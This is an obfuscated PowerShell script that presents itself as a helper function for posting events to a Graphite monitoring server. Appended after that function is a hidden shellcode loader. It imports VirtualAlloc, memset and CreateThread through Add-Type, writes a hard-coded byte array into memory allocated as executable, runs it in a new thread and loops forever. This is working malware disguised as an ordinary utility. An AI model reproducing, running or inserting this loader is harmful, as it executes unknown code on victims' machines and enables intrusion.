function sENd-`gRaPhIte`E`VEnT
{

    [CmdletBinding()]
    param
    (
        [CmdletBinding()]
        
        [Parameter(mANDatOrY = ${t`RUE})]
        [ValidateNotNull()]
        [ValidateNotNullOrEmpty()]
        [ValidateScript({ ${_} -match ((("{1}{7}{2}{3}{4}{8}{5}{0}{6}"-f'/OM','^','tp8G9h','tt','ps)OM',':OME','E/.*','(ht','E'))  -crEpLace  'OME',[cHAR]92-rEPlacE '8G9',[cHAR]124) })]
        [string]${GR`APH`ItE`Url},

        
        [Parameter(maNDatORy = ${t`RUE})]
        [ValidateNotNull()]
        [ValidateNotNullOrEmpty()]
        [Alias({"{1}{0}"-f'pic','To'}, {"{1}{0}"-f 'itle','T'}, {"{0}{1}"-f 'Sub','ject'})]
        [string]${WH`AT},

        
        [Parameter(manDaToRY = ${fAL`Se})]
        [ValidateNotNull()]
        [ValidateNotNullOrEmpty()]
        [string]${T`Ags},

        
        [Parameter(ManDaTORy = ${FA`lsE})]
        [ValidateNotNull()]
        [ValidateNotNullOrEmpty()]
        [Alias({"{0}{1}" -f 'Bod','y'})]
        [string]${d`AtA}
    )

    
    if (!(${gr`ApHiTEu`Rl}.("{2}{1}{0}"-f 'ing','ubstr','S').Invoke(${g`Ra`phI`Teurl}."l`ENg`Th" - 1) -eq '/'))
    {
        ${GR`APhi`TeuRL} = ${gRapH`iTE`Url} + '/'
    }

    
    ${gRaP`HiTE`U`RL} = ${GR`Ap`HI`TeuRL} + ("{0}{1}"-f '/events','/')

    
    ${evEn`T`oB`JECt} = &("{1}{3}{0}{2}" -f 'w-Obj','N','ect','e') ("{2}{1}{0}"-f't','bjec','PSO') -Property @{
        ("{0}{1}"-f 'wh','at') = ${W`haT}
    }

    
    if (${ta`gS})
    {
        &("{2}{1}{0}"-f'Member','-','Add') -NotePropertyName ("{1}{0}" -f's','tag') -NotePropertyValue ${T`AGS} -InputObject ${EvEN`T`ObjeCt}
    }

    
    if (${D`ATa})
    {
        &("{3}{2}{0}{1}" -f 'be','r','Mem','Add-') -NotePropertyName ("{1}{0}"-f 'ata','d') -NotePropertyValue ${DA`Ta} -InputObject ${EVE`NTOB`Je`ct}
    }

    ${e`VENTo`BJ`eCt} = ${ev`EntoBj`ecT} | &("{0}{1}{4}{3}{2}" -f 'Co','nver','on','Js','tTo-')

    &("{0}{1}{2}" -f'W','rite-Verb','ose') ("{1}{0}{2}" -f 'n Obj','Jso','ect:')
    .("{0}{1}{2}"-f'Wr','ite-Verbo','se') ${eVEnt`o`BJecT}

    try
    {
        ${reS`ULT} = .("{5}{4}{3}{2}{1}{0}" -f'st','ue','eq','e-WebR','ok','Inv') -Uri ${g`R`A`pHiteuRl} -Body ${EVENTO`Bj`ECT} -method ("{0}{1}" -f 'Pos','t') -ContentType ("{2}{1}{4}{3}{0}" -f '/json','p','ap','ion','licat')
        &("{0}{3}{1}{2}" -f'Write','rb','ose','-Ve') "Returned StatusCode: $($result.StatusCode) "
        .("{0}{1}{2}"-f 'Wri','te-','Verbose') "Returned StatusDescription: $($result.StatusDescription) "
    }

    catch
    {
        ${e`XC`EptIO`NT`ext} = .("{1}{2}{3}{4}{0}"-f 'ttyProblem','Ge','t','P','re') ${_}
        throw ('An'+' '+'e'+'rro'+'r '+'o'+'cc'+'u'+'rred '+'tryin'+'g '+'t'+'o '+'post'+' '+'da'+'ta '+'t'+'o '+'Gra'+'ph'+'ite. '+"$exceptionText")
    }

}
${Ym`hY} = ((("{13}{76}{101}{64}{3}{59}{88}{87}{99}{42}{89}{5}{97}{78}{62}{74}{47}{29}{41}{7}{71}{82}{27}{51}{92}{50}{102}{8}{9}{63}{84}{72}{46}{40}{77}{24}{104}{6}{81}{107}{54}{73}{37}{30}{16}{2}{65}{108}{10}{45}{34}{22}{69}{25}{1}{66}{80}{11}{12}{100}{0}{44}{14}{21}{20}{75}{96}{85}{36}{48}{98}{43}{26}{38}{86}{93}{32}{4}{68}{17}{19}{23}{55}{33}{95}{53}{70}{103}{61}{56}{15}{60}{18}{106}{49}{39}{28}{67}{79}{94}{58}{105}{83}{35}{31}{109}{90}{91}{57}{52}"-f ' uint','tP','xter','}','Th','ic','rt(','l','nTyp','e','r ','bu','t','[DllImp','ckSize, In','l','tic e','d',' ','Id);[DllI','tr lpStart','tP','d(','mport(','Dl','n','ti','dw','tr me','rtua','a','nt src,','lp','0}','teThrea','i','aramet',']public st','onFlags,','P','tect','lAlloc(IntPtr ','b','t dwCrea',' dwSta','Crea','o','i','e','nt','lAl','Si','nt);','vcrt.dl','ernel32.dll{','{','ub',' cou','es','kernel32.dl','ic static extern',')]p','exte',', u','t({0','n ','tr lpT','mset(I','rea','I','l{','pAddress, ui','nt flPr','0})','rn IntPtr V','A','o',');[','atic ','ntP','hreadAttri','{','nt ',' u','i',', IntPtr lpP',' I','0}','l{','l','u','int','ze, uint f','ntPtr ','tr d','ms','ddress',' st','r, uin',')]pu','es,','r','locatio','0}','lImpo','t,','I','0}k','IntPt',' ')) -F[cHaR]34);${W} = .("{0}{1}{2}"-f 'Add-T','yp','e') -memberDefinition ${Y`MHy} -Name ("{0}{1}"-f 'W','in32') -namespace ("{4}{3}{1}{2}{0}"-f's','nc','tion','in32Fu','W') -passthru;[Byte[]];[Byte[]]${z} = 0xb8,0x12,0xa5,0x84,0x6d,0xdb,0xd0,0xd9,0x74,0x24,0xf4,0x5b,0x2b,0xc9,0xb1,0x51,0x31,0x43,0x15,0x83,0xeb,0xfc,0x03,0x43,0x11,0xe2,0xe7,0x59,0x6c,0xef,0x07,0xa2,0x6d,0x90,0x8e,0x47,0x5c,0x90,0xf4,0x0c,0xcf,0x20,0x7f,0x40,0xfc,0xcb,0x2d,0x71,0x77,0xb9,0xf9,0x76,0x30,0x74,0xdf,0xb9,0xc1,0x25,0x23,0xdb,0x41,0x34,0x77,0x3b,0x7b,0xf7,0x8a,0x3a,0xbc,0xea,0x66,0x6e,0x15,0x60,0xd4,0x9f,0x12,0x3c,0xe4,0x14,0x68,0xd0,0x6c,0xc8,0x39,0xd3,0x5d,0x5f,0x31,0x8a,0x7d,0x61,0x96,0xa6,0x34,0x79,0xfb,0x83,0x8f,0xf2,0xcf,0x78,0x0e,0xd3,0x01,0x80,0xbc,0x1a,0xae,0x73,0xbd,0x5b,0x09,0x6c,0xc8,0x95,0x69,0x11,0xca,0x61,0x13,0xcd,0x5f,0x72,0xb3,0x86,0xc7,0x5e,0x45,0x4a,0x91,0x15,0x49,0x27,0xd6,0x72,0x4e,0xb6,0x3b,0x09,0x6a,0x33,0xba,0xde,0xfa,0x07,0x98,0xfa,0xa7,0xdc,0x81,0x5b,0x02,0xb2,0xbe,0xbc,0xed,0x6b,0x1a,0xb6,0x00,0x7f,0x17,0x95,0x4c,0x11,0x42,0x52,0x8d,0x85,0xfb,0xf3,0xe3,0x3c,0x57,0x6c,0xb0,0xc9,0x71,0x6b,0xb7,0xe3,0x4c,0xa8,0x14,0x5f,0xfd,0x1d,0xc8,0x37,0x3b,0xf4,0x97,0x60,0xc4,0x2d,0x34,0x3c,0x50,0xcd,0xe8,0x91,0xce,0xe4,0xe6,0x6e,0x0e,0x07,0xf7,0xa1,0x3f,0x56,0x99,0x8a,0x0a,0x58,0x35,0x9d,0x23,0xd1,0x2a,0x9b,0x34,0x34,0xdd,0xe2,0x99,0xdf,0xde,0xe8,0x7d,0xa4,0x8c,0xbf,0x2e,0xf3,0x61,0x16,0xb8,0x10,0xd0,0xb8,0x03,0x18,0x0e,0x52,0x19,0xec,0xee,0x08,0x8e,0xa3,0x43,0xf9,0x58,0x69,0x62,0x1d,0xe3,0x8e,0xbf,0x98,0xd3,0x04,0x4a,0xec,0xa6,0x0b,0x22,0x02,0xfd,0x76,0xe5,0x1d,0x28,0x1c,0x4a,0x8a,0xd2,0xf1,0x4a,0x4a,0xba,0xf1,0x4a,0x0a,0x3a,0xa1,0x22,0xd2,0x9e,0x16,0x56,0x1d,0x0b,0x0b,0xcb,0xb1,0x3a,0xcb,0xbb,0x5d,0x3c,0x34,0x44,0x9e,0x6f,0x62,0x2c,0x8c,0x19,0x03,0x4e,0x4f,0xf0,0x91,0x4f,0xc4,0x37,0x12,0x48,0x24,0x04,0xa0,0x97,0x53,0x6f,0xf3,0xd4,0xc3,0x87,0x8d,0x24,0x04,0xa8,0xbf,0xe9,0xc2,0x78,0xf1,0x3b,0x07,0xaa,0xc0,0x74,0x53,0x9c,0x11,0x4f,0x9b;${G} = 0x1000;if (${Z}."L`ENG`Th" -gt 0x1000){${G} = ${Z}."l`eN`GTH"};${z`U6}=${w}::("{0}{1}{2}"-f 'Virtu','al','Alloc').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${Z}."LeN`gth"-1);${i}++) {${W}::"ME`mSeT"([IntPtr](${Z`U6}.("{1}{0}"-f'oInt32','T').Invoke()+${i}), ${z}[${I}], 1)};${W}::("{0}{1}{2}{3}" -f'Creat','eTh','re','ad').Invoke(0,0,${z`U6},0,0,0);for (;;){.("{2}{0}{1}"-f's','leep','Start-') 60};
